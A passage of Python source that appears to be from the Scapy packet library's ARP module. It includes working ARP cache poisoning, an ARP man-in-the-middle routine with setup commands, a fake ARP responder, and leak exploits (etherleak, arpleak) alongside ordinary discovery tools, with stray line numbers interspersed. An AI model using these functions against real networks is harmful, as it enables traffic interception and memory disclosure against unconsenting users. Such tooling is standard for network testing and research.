bind_layers(GRE, Ether, proto=0x6558)
bind_layers(GRE, ARP, proto=2054)
bind_layers(GRE, GRErouting, {"routing_present": 1})
bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0})
bind_layers(GRErouting, GRErouting)
bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3)
bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3)
bind_layers(SNAP, Dot1Q, code=33024)
bind_layers(SNAP, Dot1AD, code=0x88a8)
bind_layers(SNAP, Dot1AH, code=0x88e7)
bind_layers(SNAP, Ether, code=1)
bind_layers(SNAP, ARP, code=2054)
bind_layers(SNAP, STP, code=267)
814
# Association between link type numbers and layer 2 classes.
# NOTE(review): judging by the method names, register() presumably records
# both directions while register_num2layer() / register_layer2num() record
# a single one - confirm against the definition of conf.l2types.
conf.l2types.register(ARPHDR_ETHER, Ether)
conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
conf.l2types.register(DLT_LINUX_SLL, CookedLinux)
conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2)
conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble)
conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux)
conf.l2types.register(DLT_NULL, Loopback)
conf.l2types.register(DLT_LOOP, LoopbackOpenBSD)

# ARP is also registered as a layer 3 type, under its EtherType
conf.l3types.register(ETH_P_ARP, ARP)
827
828
829# Techniques
830
831
@conf.commands.register
def arpcachepoison(
    target,  # type: Union[str, List[str]]
    addresses,  # type: Union[str, Tuple[str, str], List[Tuple[str, str]]]
    broadcast=False,  # type: bool
    count=None,  # type: Optional[int]
    interval=15,  # type: int
    **kwargs,  # type: Any
):
    # type: (...) -> None
    """Poison targets' ARP cache

    :param target: Can be an IP, a subnet (string) or a list of IPs. These are
                   the machines whose ARP cache will be poisoned.
    :param addresses: Can be either a string, a tuple or a list of tuples.
                      If it's a string, it's the IP to advertise to the victim,
                      with the local interface's MAC. If it's a tuple,
                      it's ("IP", "MAC"). If it's a list, it's [("IP", "MAC")].
                      "IP" can be a subnet of course.
    :param broadcast: Use broadcast ethernet
    :param count: Number of times the packets are sent. If None, they are
                  sent over and over until interrupted with Ctrl-C.
    :param interval: Number of seconds between two rounds
    :param kwargs: Passed to sendp()

    Examples for target "192.168.0.2"::

        >>> arpcachepoison("192.168.0.2", "192.168.0.1")
        >>> arpcachepoison("192.168.0.1/24", "192.168.0.1")
        >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1")
        >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0")))
        >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0")),
        ...                                ("192.168.0.2", "aa:aa:aa:aa:aa:aa")])

    """
    # str_target is a single address, used to pick the interface
    if isinstance(target, str):
        targets = Net(target)  # type: Union[Net, List[str]]
        str_target = target
    else:
        targets = target
        str_target = target[0]

    # Normalise "addresses" into a list of (IP, MAC) couples
    if isinstance(addresses, str):
        local_mac = get_if_hwaddr(conf.route.route(str_target)[0])
        couple_list = [(addresses, local_mac)]
    elif isinstance(addresses, tuple):
        couple_list = [addresses]
    else:
        couple_list = addresses

    # One who-has per couple, claiming that the IP is at the given MAC.
    # Without broadcast, the Ethernet destination is resolved on build.
    eth_dst = "ff:ff:ff:ff:ff:ff" if broadcast else None
    p = []  # type: List[Packet]
    for adv_ip, adv_mac in couple_list:
        p.append(
            Ether(src=adv_mac, dst=eth_dst) /
            ARP(op="who-has", psrc=adv_ip, pdst=targets,
                hwsrc=adv_mac, hwdst="00:00:00:00:00:00")
        )

    if count is None:
        # No limit: keep poisoning until the user interrupts
        try:
            while True:
                sendp(p, iface_hint=str_target, **kwargs)
                time.sleep(interval)
        except KeyboardInterrupt:
            pass
        return
    sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs)
890
891
@conf.commands.register
def arp_mitm(
    ip1,  # type: str
    ip2,  # type: str
    mac1=None,  # type: Optional[Union[str, List[str]]]
    mac2=None,  # type: Optional[Union[str, List[str]]]
    broadcast=False,  # type: bool
    target_mac=None,  # type: Optional[str]
    iface=None,  # type: Optional[_GlobInterfaceType]
    inter=3,  # type: int
):
    # type: (...) -> None
    r"""ARP MitM: poison 2 target's ARP cache

    :param ip1: IPv4 of the first machine
    :param ip2: IPv4 of the second machine
    :param mac1: MAC of the first machine (optional: will ARP otherwise)
    :param mac2: MAC of the second machine (optional: will ARP otherwise)
    :param broadcast: if True, will use broadcast mac for MitM by default
    :param target_mac: MAC of the attacker (optional: default to the interface's one)
    :param iface: the network interface. (optional: default, route for ip1)
    :param inter: value forwarded to srploop() as its ``inter`` argument
                  while the poisoning requests are looped (default: 3)
    :raises OSError: if no (IP, MAC) couple could be obtained for ip1 or ip2

    Example usage::

        $ sysctl net.ipv4.conf.virbr0.send_redirects=0  # virbr0 = interface
        $ sysctl net.ipv4.ip_forward=1
        $ sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 1
        $ sudo scapy
        >>> arp_mitm("192.168.122.156", "192.168.122.17")

    Alternative usages:
        >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1")
        >>> arp_mitm("10.0.0.1", "10.1.1.2",
        ...          target_mac="aa:aa:aa:aa:aa:aa",
        ...          mac2="00:1e:eb:bf:c1:ab")

    .. warning::
        If using a subnet, this will first perform an arping, unless broadcast is on!

    Remember to change the sysctl settings back..
    """
    if not iface:
        iface = conf.route.route(ip1)[0]
    if not target_mac:
        target_mac = get_if_hwaddr(iface)

    def _tups(ip, mac):
        # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]]
        # Build the list of (IP, MAC) couples describing one side of the MitM
        if mac is None:
            if broadcast:
                # ip can be a Net/list/etc and will be iterated upon while sending
                return [(ip, "ff:ff:ff:ff:ff:ff")]
            return [(x.query.pdst, x.answer.hwsrc)
                    for x in arping(ip, verbose=0, iface=iface)[0]]
        elif isinstance(mac, list):
            return [(ip, x) for x in mac]
        else:
            return [(ip, mac)]

    def _who_has(victims, peers, restore):
        # type: (Iterable[Tuple[str, str]], Iterable[Tuple[str, str]], bool) -> Iterable[Packet]  # noqa: E501
        # Yield the who-has requests telling each victim about each peer.
        # Poisoning: unicast to the victim, advertising the attacker's MAC.
        # Restoring: broadcast, advertising the peer's own MAC.
        for victim_ip, victim_mac in victims:
            for peer_ip, peer_mac in peers:
                if peer_ip != victim_ip:
                    if restore:
                        dst, hwsrc = "ff:ff:ff:ff:ff:ff", peer_mac
                    else:
                        dst, hwsrc = victim_mac, target_mac
                    # Iterating the packet expands any Net/list field value
                    yield from (
                        Ether(dst=dst, src=hwsrc) /
                        ARP(op="who-has", psrc=peer_ip, pdst=victim_ip,
                            hwsrc=hwsrc, hwdst="00:00:00:00:00:00")
                    )

    tup1 = _tups(ip1, mac1)
    if not tup1:
        raise OSError(f"Could not resolve {ip1}")
    tup2 = _tups(ip2, mac2)
    if not tup2:
        raise OSError(f"Could not resolve {ip2}")
    # Single formatting pass: a '%' inside iface/target_mac can no longer
    # be misread as a conversion specifier.
    macs1 = [mac for _, mac in tup1]
    macs2 = [mac for _, mac in tup2]
    print(f"MITM on {iface}: {macs1} <--> {target_mac} <--> {macs2}")
    # We loop who-has requests
    srploop(
        list(itertools.chain(
            _who_has(tup1, tup2, restore=False),
            _who_has(tup2, tup1, restore=False),
        )),
        filter="arp and arp[7] = 2",
        inter=inter,
        iface=iface,
        timeout=0.5,
        verbose=1,
        store=0,
    )
    print("Restoring...")
    sendp(
        list(itertools.chain(
            _who_has(tup1, tup2, restore=True),
            _who_has(tup2, tup1, restore=True),
        )),
        iface=iface
    )
1014
1015
class ARPingResult(SndRcvList):
    """Send/receive list specialised for ARP ping answers."""

    def __init__(self,
                 res=None,  # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]]  # noqa: E501
                 name="ARPing",  # type: str
                 stats=None  # type: Optional[List[Type[Packet]]]
                 ):
        SndRcvList.__init__(self, res, name, stats)

    def show(self, *args, **kwargs):
        # type: (*Any, **Any) -> None
        """
        Print one row per answer: Ethernet source, manufacturer and ARP
        source IP. The manufacturer reads "unknown" when the manufacturer
        database hands back the MAC address itself.
        """
        rows = []  # type: List[Tuple[str | List[str], ...]]

        for _, reply in self.res:
            vendor = conf.manufdb._get_short_manuf(reply.src)
            if vendor == reply.src:
                vendor = "unknown"
            rows.append((reply[Ether].src, vendor, reply[ARP].psrc))

        table = pretty_list(rows, [("src", "manuf", "psrc")], sortBy=2)
        print(table)
1043
1044
@conf.commands.register
def arping(net: str,
           timeout: int = 2,
           cache: int = 0,
           verbose: Optional[int] = None,
           threaded: bool = True,
           **kargs: Any,
           ) -> Tuple[ARPingResult, PacketList]:
    """
    Send ARP who-has requests to determine which hosts are up::

        arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb])

    Set cache=True if you want arping to modify internal ARP-Cache

    :param net: destination(s) used as ARP ``pdst``. When a list is given,
                its first element is used to look up the route.
    :param timeout: forwarded to srp()
    :param cache: if true, record each answer's psrc -> hwsrc in the
                  internal ARP cache
    :param verbose: forwarded to srp(); when true the result table is also
                    printed. Defaults to conf.verb.
    :param threaded: forwarded to srp()
    :param kargs: extra arguments forwarded to srp(). If ``iface`` is given,
                  its MAC is used as source address, and its IP is used as
                  ``psrc`` when no route is found.
    :returns: a tuple (answers as an ARPingResult, unanswered packets)
    """
    if verbose is None:
        verbose = conf.verb

    hwaddr = None
    if "iface" in kargs:
        hwaddr = get_if_hwaddr(kargs["iface"])
    hint = net[0] if isinstance(net, list) else str(net)
    psrc = conf.route.route(hint, verbose=False)[1]
    if psrc == "0.0.0.0":
        # No usable route: fall back on the interface's own address
        if "iface" in kargs:
            psrc = get_if_addr(kargs["iface"])
        else:
            warning(
                "No route found for IPv4 destination %s. "
                "Using conf.iface. Please provide an 'iface' !" % hint)
            psrc = get_if_addr(conf.iface)
            hwaddr = get_if_hwaddr(conf.iface)
            kargs["iface"] = conf.iface

    ans, unans = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP(
            pdst=net,
            psrc=psrc,
            hwsrc=hwaddr
        ),
        verbose=verbose,
        filter="arp and arp[7] = 2",
        timeout=timeout,
        threaded=threaded,
        iface_hint=hint,
        **kargs,
    )
    # ans is always an ARPingResult from here on, never None
    ans = ARPingResult(ans.res)

    if cache:
        for _, reply in ans:
            _arp_cache[reply.psrc] = reply.hwsrc
    if verbose:
        ans.show()
    return ans, unans
1103
1104
@conf.commands.register
def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs):
    # type: (str, str, **Any) -> bool
    """Guess whether the host at ``ip`` is in promiscuous mode.

    An ARP who-has for ``ip`` is sent to the ``fake_bcast`` Ethernet address;
    the function returns True if any answer comes back within one second.
    """
    probe = Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip)
    reply = srp1(
        probe,
        type=ETH_P_ARP,
        iface_hint=ip,
        timeout=1,
        verbose=0,
        **kargs
    )
    if reply is None:
        return False
    return True
1113
1114
@conf.commands.register
def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
    # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList]
    """Send ARP who-has requests to determine which hosts are in promiscuous mode

    Usage: promiscping(net, iface=conf.iface)

    The requests are sent to the ``fake_bcast`` Ethernet address. The answers
    are printed, then returned together with the unanswered packets.
    """
    probe = Ether(dst=fake_bcast) / ARP(pdst=net)
    answered, unanswered = srp(
        probe,
        filter="arp and arp[7] = 2",
        timeout=timeout,
        iface_hint=net,
        **kargs
    )
    result = ARPingResult(answered.res, name="PROMISCPing")

    result.show()
    return result, unanswered
1126
1127
class ARP_am(AnsweringMachine[Packet]):
    """Fake ARP Relay Daemon (farpd)

    Examples:

    Answer ARP requests for 192.168.1.100, replying on the ingress
    interface::

      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05')

    Same, but replying on a specific interface::

      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0')

    Answer ANY ARP request seen on an interface with the MAC ARP_addr::

      farpd(ARP_addr='00:01:02:03:04:05',iface='eth1')

    Answer ANY ARP request with the interface's own MAC::

      farpd(iface='eth1')

    Optional Args::

     inter=<n>   Interval in seconds between ARP replies being sent

    """

    function_name = "farpd"
    filter = "arp"
    send_function = staticmethod(sendp)

    def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None):
        # type: (Optional[str], Optional[str], Optional[str]) -> None
        # String selectors become Net objects; anything else is kept as given
        self.IP_addr = Net(IP_addr) if isinstance(IP_addr, str) else IP_addr  # type: Optional[Net]  # noqa: E501
        self.from_ip = Net(from_ip) if isinstance(from_ip, str) else from_ip  # type: Optional[Net]  # noqa: E501
        self.ARP_addr = ARP_addr

    def is_request(self, req):
        # type: (Packet) -> bool
        if not req.haslayer(ARP):
            return False
        arp = req[ARP]
        # Only who-has requests (op 1) are answered
        if arp.op != 1:
            return False
        # Optional restriction on the requested address
        if self.IP_addr is not None and arp.pdst not in self.IP_addr:
            return False
        # Optional restriction on the requester's address
        return self.from_ip is None or arp.psrc in self.from_ip

    def make_reply(self, req):
        # type: (Packet) -> Packet
        ether = req[Ether]
        arp = req[ARP]

        # Remember the outgoing interface: send_reply/print_reply reuse it
        if 'iface' in self.optsend:
            iff = cast(Union[NetworkInterface, str], self.optsend.get('iface'))
        else:
            iff, _addr, _gw = conf.route.route(arp.psrc)
        self.iff = iff

        hw = self.ARP_addr
        if hw is None:
            # Default to the interface's MAC, or a null MAC if unavailable
            try:
                hw = get_if_hwaddr(iff)
            except Exception:
                hw = "00:00:00:00:00:00"

        eth_part = Ether(dst=ether.src, src=hw)
        arp_part = ARP(op="is-at",
                       hwsrc=hw,
                       psrc=arp.pdst,
                       hwdst=arp.hwsrc,
                       pdst=arp.psrc)
        return eth_part / arp_part

    def send_reply(self, reply, send_function=None):
        # type: (Packet, Any) -> None
        # Add the interface picked in make_reply unless the caller set one
        extra = {} if 'iface' in self.optsend else {'iface': self.iff}
        self.send_function(reply, **extra, **self.optsend)

    def print_reply(self, req, reply):
        # type: (Packet, Packet) -> None
        parts = (req.summary(), reply.summary(), self.iff)
        print("%s ==> %s on %s" % parts)
1217
1218
@conf.commands.register
def etherleak(target, **kargs):
    # type: (str, **Any) -> Tuple[SndRcvList, PacketList]
    """Exploit Etherleak flaw

    Sends an ARP request for ``target`` through srp(). The ``prn`` callback
    given to srp() returns the hex string of the answer's padding when the
    answer carries a padding layer, and False otherwise.
    """
    def _padding_hex(s_r):
        # type: (Any) -> Any
        answer = s_r[1]
        if conf.padding_layer not in answer:
            return False
        return hexstr(answer[conf.padding_layer].load)

    probe = Ether() / ARP(pdst=target)
    return srp(probe, prn=_padding_hex, filter="arp", **kargs)
1226
1227
@conf.commands.register
def arpleak(target, plen=255, hwlen=255, **kargs):
    # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
    """Exploit ARP leak flaws, like NetBSD-SA2017-002.

    Sends ARP requests whose ``plen``/``hwlen`` fields are forced to the
    given values, then hexdumps whatever the answers carry beyond the
    regular 4 address bytes (psrc) and 6 address bytes (hwsrc).

https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc

    """
    # Requests are built explicitly and grouped by outgoing interface
    by_iface = {}  # type: Dict[str, List[Packet]]
    for req in ARP(pdst=target):
        # Addresses are filled in by hand because the length fields that
        # Scapy would rely on are about to be tampered with
        out_if = conf.route.route(req.pdst)[0]
        my_ip = get_if_addr(out_if)
        my_mac = get_if_hwaddr(out_if)
        req.plen = plen
        req.hwlen = hwlen
        if plen != 4:
            # Non-standard length: store raw, truncated address bytes
            req.psrc = inet_aton(my_ip)[:plen]
            req.pdst = inet_aton(req.pdst)[:plen]
        else:
            req.psrc = my_ip
        req.hwsrc = my_mac if hwlen == 6 else mac2str(my_mac)[:hwlen]
        frame = Ether(src=my_mac, dst=ETHER_BROADCAST) / req
        if out_if not in by_iface:
            by_iface[out_if] = []
        by_iface[out_if].append(frame)

    ans, unans = SndRcvList(), PacketList(name="Unanswered")
    for out_if, frames in by_iface.items():
        got, missed = srp(frames, iface=out_if, filter="arp", **kargs)
        ans += got
        unans += missed
        ans.listname = "Results"
        unans.listname = "Unanswered"

    # Dump every byte received past the regular address sizes
    for _, answer in ans:
        if ARP not in answer:
            continue
        arp = answer[ARP]
        for fname, std_len, asked_len in (("psrc", 4, plen),
                                          ("hwsrc", 6, hwlen)):
            raw = arp.get_field(fname).i2m(arp, getattr(arp, fname))
            if asked_len > std_len and len(raw) > std_len:
                print(fname)
                hexdump(raw[std_len:])
                print()
    return ans, unans
1280